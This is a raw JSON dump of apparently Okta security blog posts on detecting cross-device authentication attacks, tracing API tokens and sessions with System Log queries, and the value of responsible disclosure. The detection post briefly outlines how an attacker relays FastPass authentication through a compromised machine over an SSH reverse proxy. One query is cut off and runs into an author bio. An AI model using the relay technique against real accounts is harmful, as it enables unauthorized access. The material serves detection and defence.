"},"image":null,"name":"Defensive Cyber Operations","jobTitle":"","slug":"defensive-cyber-operations","node_locale":"en"}]},{"slug":"/articles/2025/04/detect-and-prevent-cross-device-auth","id":"cfbab762-327e-550b-9646-3cd93bc27450","title":"Detect and Prevent Cross Device Authentication","date":"2025-04-17T09:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"So, you recently implemented phishing-resistant authentication policies.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Firstly, congrats! You’ve significantly raised the bar for potential threat actors and have a far better chance of detecting a compromise going forward. This will force threat actors to shift their focus to compromising your end-user devices. So what does this actually look like and what else can you do?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Even with phishing resistant authentication in place, there are several techniques a threat actor could employ that leverage a compromised endpoint to successfully authenticate to Okta-protected resources. The threat model for FIDO authentication, for example, notes that there are \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://fidoalliance.org/specs/common-specs/fido-security-ref-v2.1-ps-20220523.pdf\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"limits to how much protection\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" an authenticator offers if the hardware it operates on is compromised.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One such example of this is what we call a ‘Cross Device Authentication (CDA) attack’ - this is when an attacker connects to a protected resource from their machine and forwards the required authentication flow through a machine they have previously compromised to gain unauthorized access.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"I won't go into all the details here, as this technique has previously been proposed and documented by other researchers (\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://blog.xpnsec.com/identity-providers-redteamers\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"XPNSec\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://gitlab-com.gitlab.io/gl-security/security-tech-notes/red-team-tech-notes/okta-verify-bypass-sept-2024/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"GitLab\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\").\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Combatting CDA Attacks\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Prevention\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Steve Lind recently published a great blog, ‘\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2025/04/stay-secure-with-fastpass-and-trusted-app-filters/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Stay secure with FastPass and Trusted App Filters\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"’, which details what \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/authenticators/trusted-app-filters-for-fastpass.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Trusted App Filters\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" are and how they can be used to protect against Cross Device Authentication (CDA) attacks, so be sure to check it out.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Detection\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In this blog post, I would like to provide some potential detection ideas off the back of Trusted App Filters. When you authenticate with FastPass using the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"LOOPBACK\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"APPLE_SSO_EXTENSION\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" binding methods (i.e. the phishing-resistant methods), you will find in the associated user.authentication.auth_via_mfa event, under the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"‘AuthenticatorContext’\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" object, a variety of information about the process that initiated the authentication is logged.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"5nOYAureGL8o2VgpyUZNiZ\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These values are particularly useful from a detection perspective, as they give you visibility into what process the authentication request was initiated from, and can be used to detect unexpected or anomalous processes initiating authentication in your environment. Our Identity Defence Operations team have put together an \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/okta/customer-detections/blob/master/detections/fastpass_auth_via_suspicious_binary.yml\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"example query\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that you can use to identify authentication requests that are not initiated by a browser using System Log. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Leveraging \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/xpn/OktaPostExToolkit/tree/master/oktarealfast\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Adam Chester’s\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" lightweight proxy on our attacker machine and an SSH reverse proxy on the compromised machine, when we authenticate to an Okta protected resource from the attackers machine, the authentication request is forwarded over the reverse proxy to FastPass on the compromised machine. Looking in the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"‘AuthenticatorContext’ \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"object we can see that the initiating process is SSH.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"22PJ0fQyvgLoiHxlErinkx\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Another potential avenue for detecting Cross Device Authentication (CDA) attacks is via anomalies in the session establishment. During the authentication flow a user.session.start event and a user.authentication.auth_via_mfa event are generated. Leveraging the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/rootsessionidroottokenid/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"root_session_id\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", we can tie these events together. Next we can extract the client IPs from each event, looking for when they don't match. In an attack scenario, the IP in the user.session.start event will be the attacker and the IP in the\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"user.authentication.auth_via_mfa event will be the compromised device. We can then layer techniques like impossible travel, conflicting ASNs or changes in User Agents to identify suspicious events. At times, (depending on your environment) these methods can be prone to false positives, so combining this with an anomalous calling process can help filter out the noise and turn this into a robust detection opportunity. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"62whkyYfYxMvF1CSQdAmSF\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Closing comments\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To find out more, I highly recommend checking out Steve Lind’s recent \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2025/04/stay-secure-with-fastpass-and-trusted-app-filters/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"blog\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", which covers Trusted Application Filters more in-depth. If you can’t get enough after that, check out our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/oktane/2024/sessions/back-to-the-future-the-re-emergence-of-device-based-attacks/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Oktane on Demand 2024 session\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", where Steve and I include a demo on how Trusted App Filters can thwart Cross Device Authentication (CDA) attacks.\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"Trusted App Filters accounts for Identity-based attacks arising from compromised hardware. This blog article provides insights and resources on preventing and detecting Cross Device Authentication (CDA) authentication attacks."},"updatedAt":"2025-04-17T22:06:11.690Z","secAuthor":[{"id":"21ae8763-5bd4-5d85-9ae3-0f53eb81433d","bio":{"bio":"Zach Newton is the Senior Manager of the Global Adversarial Engineering and Operations team at Okta, who are focused on adversary simulation and offensive-driven detection research. Prior to joining Okta, Zach worked in a variety of offensive and defensive roles across financial services, telecommunications and retail.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/wNSXK3ik5gdGgY2gFU1Yv/ad8668990c94990af8e82dd16018b58b/Zach_Newton_Headshot.jpg"},"name":"Zach Newton","jobTitle":"Senior Manager, Adversarial Engineering & Operations","slug":"/hackers/zach-newton","node_locale":"en"}]},{"slug":"/rootsessionidroottokenid","id":"0f833488-0720-5751-b494-4e951457b99f","title":"One trick finds the root of any Okta troubles","date":"2025-03-03T06:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"data\":{},\"content\":[{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Whether you’re troubleshooting a technical issue or performing a forensic investigation in your \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/workforce-identity/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Okta Workforce Identity\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" org, this article introduces a couple of new queries that can quickly get you to the root of the problem. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"They arise from the addition of two new key/value pairs in a large number of \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://developer.okta.com/docs/api/openapi/okta-management/management/tag/SystemLog/#tag/SystemLog\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Okta System Log\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" events, designed to help administrators, auditors and incident responders get their job done faster.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"These helpful tricks are brought to you by the letters O, S, I and C. If you haven’t heard, this acronym stands for The \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://www.okta.com/au/secure-identity-commitment/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Okta Secure Identity Commitment\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", which is Okta’s long-term initiative to lead the industry in the fight against Identity attacks.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"All events using an API token\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The first object to take note of is the RootApiTokenId. A RootApiTokenId will first appear as the target.id when you create an API token, irrespective of whether it’s a management API token or an OAuth token in Okta:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"code\"}],\"value\":\"eventType eq \\\"system.api_token.create\\\" and target.id eq \\\"[RootApiTokenId]\\\"\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"From that point on, the same RootApiTokenId will be stamped in the transaction.detail.rootApiTokenId value of every logged event that arises from the use of that API token.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"If that token were ever compromised, or causing you some other manner of trouble, you’re able to find all logged API actions performed using that token using a single query:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"code\"}],\"value\":\"transaction.detail.rootApiTokenId eq \\\"[insert RootApiTokenId value]\\\"\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{\"target\":{\"sys\":{\"id\":\"7xnhvFwAwMDrxF28Fv8TbF\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[],\"nodeType\":\"embedded-asset-block\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"\\n\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"One thing to note, however: Okta management API tokens, sometimes referred to as static or \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://developer.okta.com/docs/guides/create-an-api-token/main/\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"SSWS Tokens\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", are often long-lived. They expire if an administrator revokes or rotates them or they aren’t used for 30 days. A token created more than 90 days ago is outside the retention period of Okta System log events, in which case you’ll only find the token \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"italic\"}],\"value\":\"creation\",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[],\"value\":\" event if you have been streaming these events to your SIEM and archiving them there. You can otherwise find all active tokens listed in the Okta Admin Console under \",\"nodeType\":\"text\"},{\"data\":{},\"marks\":[{\"type\":\"bold\"}],\"value\":\"Security > API > Tokens.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"We recommend eschewing static tokens for \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/apiservice/api-service-integrations.htm\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"OAuth2.0 tokens\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" in production applications, given the latter are \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://developer.okta.com/blog/2023/04/24/api-integrations\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"short-lived\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\", sender-constrained, and can operate independently of the account used to create them. If for any reason OAuth 2.0 is infeasible, static tokens should be created using a dedicated \",\"nodeType\":\"text\"},{\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/custom-admin-role/custom-admin-roles.htm\"},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"underline\"}],\"value\":\"Custom Admin Role\",\"nodeType\":\"text\"}],\"nodeType\":\"hyperlink\"},{\"data\":{},\"marks\":[],\"value\":\" that is only granted the minimum permissions required for the integration to function, and use of the token should be allowlisted to a specific IP or IP range where Okta should expect API calls for this app to originate from.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"All events during a user session\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The second object of interest is the RootSessionId. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Much the same logic applies as with our method of tracking the use of an API token, only now we’re applying the same method to an interactive user session. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The RootSessionId will first appear as the authenticationContext.rootSessionId value when an interactive user successfully validates their identity at primary authentication:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"code\"}],\"value\":\"eventType eq \\\"user.session.start\\\" and authenticationContext.rootSessionId eq \\\"[RootSessionId]\\\"\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"From that point on, the same RootSessionId will be stamped in the authenticationContext.rootSessionId value of every logged event during the user’s interactive session.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"If you ever have cause to suspect that session was compromised, you’re able to find all user actions performed using that token using a single query:\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"code\"}],\"value\":\"authenticationContext.rootSessionId eq \\\"[insert RootSessionId value]\\\"\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{\"target\":{\"sys\":{\"id\":\"4o3JJCwiQDXh4tK3E69HFA\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[],\"nodeType\":\"embedded-asset-block\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Wait, this sounds familiar\",\"nodeType\":\"text\"}],\"nodeType\":\"heading-2\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"So what’s the difference between the externalSessionID and the RootSessionId? It sort of sounds like they do the same thing, right? \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"Well, almost the same thing. The distinction is that some user actions result in creation of a new externalSessionId. \",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"If a user performs some form of factor lifecycle event, for example, they will be challenged to verify their identity using an existing pre-enrolled factor. Once they successfully perform this action, they have effectively commenced a new session. That makes logical sense, but when you’re troubleshooting or in response mode and want to see the bigger picture, searching with only the externalSessionId can result in missed events. The RootSessionId value, by contrast, is added to every user action up until the session expires or the user signs out.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"The only exceptions to that rule are system generated events (that is, actions taken by the Okta platform in response to user generated events, but not initiated by a user), or events sourced in or triggered by Okta Workflows, Okta Privileged Access, and Okta Access Requests, which have their own unique identifiers.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[],\"value\":\"To catch any potential edge cases, we suggest that any analysis of session activity also includes a sweep of actions by the IP address or actor in question. The following query can be used to identify any actions that correspond to a given criteria, but without a rootSessionId value.\",\"nodeType\":\"text\"}],\"nodeType\":\"paragraph\"},{\"data\":{},\"content\":[{\"data\":{},\"marks\":[{\"type\":\"code\"}],\"value\":\"not(authenticationContext.rootSessionId pr) ANDDan is a Group Product Manager, responsible for Okta's product data platform. Dan has spent the last 14 years in the enterprise software space in roles across both go-to-market and product management. He holds a bachelor's degree in electrical engineering from Case Western Reserve University.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5wVwNMsIlx1wQjZnfiMWfE/f2c80703330283505d57fb4e3ae8109d/dand.png"},"name":"Dan Dennhardt","jobTitle":"Group Product Manageer","slug":"/hackers/dan-dennhardt","node_locale":"en"},{"id":"ce5c6303-da17-5bcb-8917-7592d3c88ac7","bio":{"bio":"Vadim has 15+ years of experience in web application development, with expertise in identity management and access control frameworks, application security, secure software development, and cryptography. Outside of work, Vadim enjoys biking, hiking, playing the guitar, reading, and solving mathematical puzzles.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/6WhyV4HRXrSvjK0ReOlrtt/652205e0620e9613548bdc7df33c2068/vadims.jpeg"},"name":"Vadim Spector","jobTitle":"Principal Software Engineer","slug":"/hackers/vadim-spector","node_locale":"en"},{"id":"b006f4e2-a177-55cd-a2ee-ff041e6ece35","bio":{"bio":"John leads the EMEA node of Okta's Detection and Response Engineering team.
\n\nHis team develops detections and supplementary automations to protect Okta from threat actors, which in turn inform our rotational response and threat hunting missions.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/3156PfzPum7cu577jTvWv5/fda95a934e6567e0d6f41e6ce1da8c56/johnmurphy.jpg"},"name":"John Murphy","jobTitle":"Manager, Defensive Cyber Operations (EMEA)","slug":"john-murphy","node_locale":"en"},{"id":"8f5a8df8-9538-59df-b948-3cf6f2d2168d","bio":{"bio":"Dinko Bajric is a Software Architech on Okta's Engineering team. Over the past 15 years, Dinko has had experience in diverse areas, including backend engineering, UI/UX, security, telemetry and analytics, performance and reliability, and management. His broad range of expertise helps him approach challenges from different perspectives, aiming to deliver reliable and efficient outcomes. Outside of work, Dinko enjoys tinkering with home automation hardware and software, but when he wants a break from technology, he builds furniture.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/hmcQwZra3FSYIEp1DQtJ7/7c196e254f942f623c262892b53a4e6f/Dinko.jpg"},"name":"Dinko Bajric","jobTitle":"Software Architect","slug":"/hackers/dinko-bajric","node_locale":"en"}]},{"slug":"/articles/2024/04/how-responsible-disclosures-are-shaping-a-safer-cyberspace","id":"6cecc7f1-1fd7-5699-8288-e2528705e331","title":"How Responsible Disclosures are Shaping a Safer Cyberspace","date":"2025-04-09T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A staggering 40,003 total CVEs were \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://nvd.nist.gov/vuln/search\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"recorded\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" by the National Vulnerability Database (NVD) in 2024. Technology advancements and the rate at which features are continually released undoubtedly contribute to these rising numbers, which represent a 39% increase from 2023. Prioritizing security from the start by employing secure coding and development practices is key to mitigating vulnerabilities.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The cybersecurity risk landscape continues to evolve rapidly with the rise of threat actor sophistication and tooling. In 2024, attacks involving the exploitation of web application vulnerabilities increased significantly — by \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.verizon.com/business/resources/reports/dbir/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"180%\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" — nearly triple that of the previous year.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Benefits of ethical hacking\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What was once considered a controversial topic has gained widespread appeal as a crucial practice in the ongoing fight against threat actors and vulnerability exploitation. Ethical hackers and security researchers are revolutionizing today’s vulnerability management programs and reducing online risks by participating in Bug Bounty programs and disclosing vulnerabilities responsibly.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta supports and actively participates in responsible disclosure practices including a Bug Bounty program, which contributes to a safer online community by reducing the number of active vulnerabilities that could be exploited by threat actors with malicious intent. Industry benefits of responsible disclosures continue to grow for software vendors and technology users alike.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Industry inclusivity\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Traditional approaches to cybersecurity predate modern-day responsible disclosures and other notable programs such as \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.bugcrowd.com/bug-bounty-list/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"BugCrowd\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://googleprojectzero.blogspot.com/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Project Zero\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". Organizations can now leverage the skillset of the hacker community to improve their security posture. Ethical hackers are provided an environment to learn, test, and responsibly disclose security issues to technology vendors.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Improved security\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The more testing, the better. Ethical hackers who attempt to discover software vulnerabilities with the intention of closing security gaps improve security posture. However, a Bug Bounty program should not replace a full-time security team; dedicated, internal talent, including Offensive Security or Product Security, is highly advisable. Ethical hacking programs should complement a comprehensively robust security program.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Cost savings\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Bug Bounty programs offer organizations additional security safeguards while awarding monetary rewards to ethical hackers for successfully discovering and reporting bugs or vulnerabilities to the software vendor. The cost of an exploited vulnerability resulting in a data breach will far outweigh any Bug Bounty reward.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Transparency\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Trust starts with transparency: technology vendors are granted opportunities to be transparent with their customers, given the identification of vulnerabilities. Responsible disclosure programs aim to socialize ethical hacking practices further and improve vendor transparency by avoiding silent patching. Organizations are subject to NVD standards when remediating and communicating vulnerability-related information to customers and users.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta and BugCrowd\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta is proud to offer Bug Bounty programs through BugCrowd which create direct connections to the global security researcher community. Okta welcomes submissions and believes that community participation plays an integral role in protecting our clients’ systems and data.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"On any given day, thousands of lines of code are written, and hundreds of thousands are released into production for the Okta and Auth0 platforms. These programs are a supplementary security practice to our standard \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/resources/whitepaper-secure-development-lifecycle/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Secure Development Lifecycle\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (SDL) methodologies which include in-depth reviews at various stages of 